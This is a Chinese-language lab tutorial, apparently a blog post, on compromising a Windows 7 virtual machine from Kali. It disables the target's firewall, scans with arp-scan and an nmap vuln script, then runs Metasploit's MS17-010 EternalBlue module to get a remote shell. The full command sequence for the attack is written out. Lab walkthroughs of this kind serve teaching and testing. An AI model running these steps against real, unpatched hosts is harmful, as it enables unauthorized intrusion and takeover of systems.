赞
踩
不过首先你要有一个kali的虚拟机作为我们的攻击机,并且要有Metasploit,也就是标题中的msf。还有一个win7系统的虚拟机,也就是我们的受害机。两个虚拟机都设置成NET模式
注意:win7系统的防火墙记得要关掉
点击这里打开网络和共享中心
点击Windows防火墙
点击打开或关闭Windows防火墙
选择和下图一样的配置,然后确定即可
随后按住win+R,输入cmd,打开DOS命令行,输入ipconfig,查询本机的IP地址,记住他
到这里我们的准备工作就结束了
确认我们的受害机是否在我们可以攻击到的范围内,在命令行中输入
arp-scan -l
我这里受害机的IP是192.168.80.136,可以扫描到。
在命令行输入
nmap -Pn -O -A --script=vuln 192.168.80.136
nmap -Pn 表示不进行主机存活检测,即使目标主机没有响应ping请求也会继续扫描,这对于目标主机禁用ICMP协议的情况比较常见。
nmap -A 使用所有高级扫描选项。
nmap -O 这个选项激活对TCP/IP指纹特征(fingerprinting)的扫描,获得远程主机的操作系统类型。
nmap --script 使用nmap自带脚本
输入以下指令
msfconsole
输入以下指令
search ms17-010
这里显示的是针对永恒之蓝的四种攻击模块。
“EternalBlue SMB Remote Windows Kernel Pool Corruption” 指的是一个利用MS17-010漏洞的攻击模块。这个模块利用了Windows操作系统中SMB服务的漏洞,允许远程执行代码,进而导致对Windows内核池的破坏。这个漏洞使得攻击者可以远程执行恶意代码,从而获取系统权限或者对系统进行破坏。
输入以下指令:
use 0
输入以下指令:
show options
我们发现rhosts参数为必需
这里的rhost为我们的受害机的IP地址,我的受害机的IP为192.168.80.136
输入以下命令:
set rhost 192.168.80.136
输入以下指令:
run
如果最终的结果没有出现win,那就先输入exit,然后再run一下
输入?即可查询
这里有很多指令,我就不一一赘述了,大家可以翻译一下
我们现在已经拿到了win7的shell了,也就是可以远程操控win7(受害机)了,但是目前我们还是在kali环境中,我们需要进入DOS环境后才能输入DOS指令。
输入以下指令:
shell
为了防止中文乱码,我们再输入以下指令:
chcp 65001
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。